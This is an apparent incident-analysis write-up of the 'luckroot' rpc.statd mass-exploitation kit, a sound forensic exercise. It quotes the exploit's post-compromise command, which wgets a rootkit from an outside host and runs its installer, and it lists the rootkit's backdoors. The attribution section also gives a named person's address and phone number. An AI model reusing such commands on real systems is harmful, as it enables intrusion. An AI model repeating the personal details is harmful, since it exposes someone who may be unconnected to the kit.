wait3r@the-pentagon.com 05/02/01@10.30a Contents of LUCKROOT.TAR (gzip compressed, tar archive). luckroot/ luckroot/luckstatdx.c luckroot/luckgo luckroot/luckscan-a.c luckroot/luckscan-a luckroot/luckstatdx 1. What is the blackhat attempting to do with his command line syntax? Retrieves the blackhat tool from a website where it is located using the ISC webclient 'lynx' (http://lynx.isc.org) Tries to then extract the compressed tar file, 4th time lucky. The 'blackhat' then proceeds to run his tool providing two parameters, the first being the first octet of the IP address, the second of course being the second. Indicating it should scan only a Class B subnet. 2. What does the tool accomplish? Attempts to 'mass exploit' servers through the rpc.statd vulnerability. it will then (attempt) install a rootkit on a successful compromise. 3. How does the tool work? The 'blackhat' provides upto 3 arguments (and a minimum of 1) to the modified shell script (from VetesScan) called "goluck". luckscan-a, is then called using the previous arguments. luckscan-a is a slightly modified version of Volatile's pscan-a.c, a non blocking TCP scanner. When the modified pscan detected a machine with an open 111/tcp port, it will blindly run a (again slightly modified) copy of ron1n's statdx (luckstatdx), against the machine. Providing the remote machine is actually running rpc.statd, on Linux/x86 and is vulnerable, the exploit issues the following commands: “cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz” xzibit.tar.gz is the rootkit which contains: lamerk/ lamerk/ifconfig lamerk/linsniffer lamerk/logclear lamerk/netstat lamerk/ps lamerk/sense lamerk/sl2 lamerk/top lamerk/s lamerk/install lamerk/sshdu lamerk/ssh_host_key lamerk/ssh_random_seed lamerk/hdparm lamerk/becys.cgi linsniffer/ifconfig/netstat/ps/top are all lrk[34] (libc5) binarys. install, is the shell install script. hdparm is the sniffer startup script. sshdu, trojaned sshd1.2.27, configured to run on port 6969. becys.cgi, trojaned cgi which allows the user to run shell commands as the uid of the webserver. sense, (perl script) formats the output of tcp.log (sniffer log) sl2, slice, denial of service tool (SYN flooder). 4. Is this tool a worm, or would you classify it as something else? Nope, its a hacked together mass exploitation tool. Not a worm since it doesn't propagate. 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? Far from it. The tool kit: luckgo = shell script from VetesScan. luckscan-a.c = pscan-a.c by Volatile. luckstatdx.c = statdx.c by ron1n. Nothing new. Bonus Question: What information can you obtain about who is using or created the tool? From the “ssh_host_key” (in the rootkit), the owner seemed to be root@localhost.localdomain, shame. From the “install” script (in the rootkit), you can see the addresses which the wants to keep hidden. 193.231.139.* (ROEDUNET-LICEE1) Allocated to ROEDUNET connected high schools; RO 213.154.137.* (RO-PCNET-20000128) PCNET Data Network - ISP in Romania; PROVIDER; RO 193.254.34.* 193.254.34.0 - 193.254.34.15 (FININVNET) FININVEST; RO 193.254.34.16 - 193.254.34.31 (LOGICNET) LOGIC NET; GALATI - 1st Modem Pool; RO 193.254.34.48 - 193.254.34.63 (SSICTCEGL) SSI CTCE Galati; RO 193.254.34.64 - 193.254.34.79 (LOGICNET) LOGIC NET; TIMISOARA - 1st Modem Pool; RO 193.254.34.80 - 193.254.34.87 (LOGICNET) LOGIC NET; ARGES - 1st Modem Pool; RO 193.254.34.96 - 193.254.34.127 (MICROINFO) Microinformatica S.A. Cluj; RO 193.254.34.128 - 193.254.34.135 (LOGICNET) LOGIC NET; HUNEDOARA - 1st Modem Pool; RO 193.254.34.136 - 193.254.34.143 (LOGICNET) LOGIC NET; Caras-Severin - 1st Modem Pool; RO 193.254.34.144 - 193.254.34.152 (LOGICNET) LOGIC NET; Bistrita-Nasaud - 1st Modem Pool; RO 193.254.34.160 - 193.254.34.175 (CONSUL) Consul-Deva; RO 193.254.34.192 - 193.254.34.207 (LOGICNET) LOGIC NET; SICO CRAIOVA - Modem Pool; RO 193.254.34.240 - 193.254.34.255 (SICO) SICO-CRAIOVA LAN; RO Quick search on Google.com revealed something interesting.. http://www.rdsnet.ro/rds-bin/publicitate_detaliu?anunttype_id=1 Scroll down to the post from: 19-Oct-2000. Kind of looks like a phone number (093837243) eh? My Romanian isn’t great but looks like he’s trying to sell a car (or something). Also seems that [s]he posted to http://www.extrem.ro, indicating [s]he is/was located in Bucharest. I guess the page expired since there was no information on the actual page which lycos.com had turned up (http://www.extrem.ro/msg1.htm). This version seems to have been modified by "becys@becys.org", as that who the rootkit is owned by. (it sends mail to that mail address) Administrative Contact: Qian Wang becys@yahoo.com bSoft 1 Hensel Dr. Apt.#Z1F College Station, Texas 77840 US Phone- (979)862-9233 Carded I guess.. Cya.